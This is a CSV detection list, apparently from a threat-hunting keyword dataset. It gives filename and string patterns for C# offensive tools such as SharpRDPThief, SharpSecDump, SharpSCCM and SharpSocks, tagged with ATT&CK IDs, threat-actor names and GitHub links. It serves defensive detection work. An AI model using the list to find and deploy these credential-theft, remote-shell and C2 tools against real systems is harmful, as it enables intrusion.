"*SharpRDPHijack.cs*",".{0,1000}SharpRDPHijack\.cs.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","59102"
"*SharpRDPHijack.exe*",".{0,1000}SharpRDPHijack\.exe.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","59103"
"*SharpRDPHijack-master*",".{0,1000}SharpRDPHijack\-master.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","59104"
"*SharpRDP-master*",".{0,1000}SharpRDP\-master.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59105"
"*SharpRDPThief is a C# implementation of RDPThief*",".{0,1000}SharpRDPThief\sis\sa\sC\#\simplementation\sof\sRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","59106"
"*SharpRDPThief.csproj*",".{0,1000}SharpRDPThief\.csproj.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","59107"
"*SharpRDPThief.exe*",".{0,1000}SharpRDPThief\.exe.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","59108"
"*Sharpreflect *",".{0,1000}Sharpreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59109"
"*SharpReg.exe*",".{0,1000}SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59110"
"*SharpRoast.exe*",".{0,1000}SharpRoast\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation tool","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","N/A","10","1313","237","2024-10-24T21:58:54Z","2018-07-25T23:38:15Z","59111"
"*SharpRoast.exe*",".{0,1000}SharpRoast\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59112"
"*SharpRODC.exe*",".{0,1000}SharpRODC\.exe.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","59113"
"*SharpRODC.pdb*",".{0,1000}SharpRODC\.pdb.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","59114"
"*SharpSAMDump.exe*",".{0,1000}SharpSAMDump\.exe.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","1","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","59115"
"*sharpsc *cmd*",".{0,1000}sharpsc\s.{0,1000}cmd.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59116"
"*SharpSCCM*",".{0,1000}SharpSCCM.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59117"
"*SharpSCCM.csproj*",".{0,1000}SharpSCCM\.csproj.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59118"
"*SharpSCCM.exe*",".{0,1000}SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59119"
"*SharpSCCM.exe*",".{0,1000}SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59120"
"*SharpSCCM.Program*",".{0,1000}SharpSCCM\.Program.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59121"
"*SharpSCCM_merged.exe*",".{0,1000}SharpSCCM_merged\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59122"
"*SharpSCShell*",".{0,1000}SharpSCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","59123"
"*SharpSearch.exe*",".{0,1000}SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59124"
"*SharpSecDump Info*",".{0,1000}SharpSecDump\sInfo.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59125"
"*SharpSecDump.csproj*",".{0,1000}SharpSecDump\.csproj.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59126"
"*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59127"
"*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59128"
"*SharpSecDump.sln*",".{0,1000}SharpSecDump\.sln.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59129"
"*SharpSecDump-master*",".{0,1000}SharpSecDump\-master.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59130"
"*sharpsecretsdump*",".{0,1000}sharpsecretsdump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","59131"
"*SharpShares.csproj*",".{0,1000}SharpShares\.csproj.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","59132"
"*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59133"
"*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","59134"
"*SharpShares.sln*",".{0,1000}SharpShares\.sln.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","59135"
"*SharpShellPipe.exe*",".{0,1000}SharpShellPipe\.exe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","59136"
"*SharpShellPipe.sln*",".{0,1000}SharpShellPipe\.sln.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","59137"
"*SharpShellPipe-main*",".{0,1000}SharpShellPipe\-main.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","59138"
"*SharpShooter.py*",".{0,1000}SharpShooter\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","59139"
"*SharpShot.exe /*",".{0,1000}SharpShot\.exe\s\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","59140"
"*Sharp-SMBExec.exe*",".{0,1000}Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT20 - APT29 - PowerPool","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59141"
"*SharpSniper.exe*",".{0,1000}SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59142"
"*SharpSocks.exe*",".{0,1000}SharpSocks\.exe.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59143"
"*SharpSocks.pfx*",".{0,1000}SharpSocks\.pfx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59144"
"*SharpSocks.resx*",".{0,1000}SharpSocks\.resx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59145"
"*SharpSocks.sln*",".{0,1000}SharpSocks\.sln.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59146"
"*SharpSocksCommon*",".{0,1000}SharpSocksCommon.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59147"
"*SharpSocksConfig*",".{0,1000}SharpSocksConfig.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59148"
"*SharpSocksImplant*",".{0,1000}SharpSocksImplant.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59149"
"*SharpSocksServer*",".{0,1000}SharpSocksServer.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59150"
"*SharpSocksServer.Sh*",".{0,1000}SharpSocksServer\.Sh.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","59151"
"*SharpSpawner.cs*",".{0,1000}SharpSpawner\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59152"
"*SharpSphere.exe*",".{0,1000}SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59153"
"*SharpSploit Command Execution*",".{0,1000}SharpSploit\sCommand\sExecution.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59154"
"*SharpSploit Credentials Commands*",".{0,1000}SharpSploit\sCredentials\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59155"
